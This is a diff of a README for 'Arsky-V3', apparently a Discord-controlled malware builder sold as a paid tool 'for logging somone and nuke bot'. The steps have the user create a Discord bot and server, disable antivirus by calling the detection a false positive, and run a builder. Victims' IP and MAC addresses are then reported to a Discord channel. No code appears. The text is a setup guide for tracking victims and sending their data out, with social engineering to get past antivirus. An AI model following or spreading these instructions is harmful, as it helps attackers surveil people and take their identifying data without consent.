Arsky14530/Arsky-V3/README.md

 2) Then make your bot. add the bot to a brand new discord server
 3) after you do all of thoes steps make sure to turn off anti virus ( flase postive and ps: it flags as virus cuz of nuitka with github link of nuitka with it https://nuitka.net/doc/user-manual.html )
 4) then download the file and extract it to the windows.
-5) after run builder.py let it install everything you need
+5) after run builder file let it install everything you need
 6) Then go to Arsky Priv Paid tool (Note This is a paid tool for logging somone and nuke bot.)
 7) after double click Arsky Tool
 8) then go to the server you just made and there should be a new channel name session-1 in the server it would show you who and when and there ip. with there mac adress.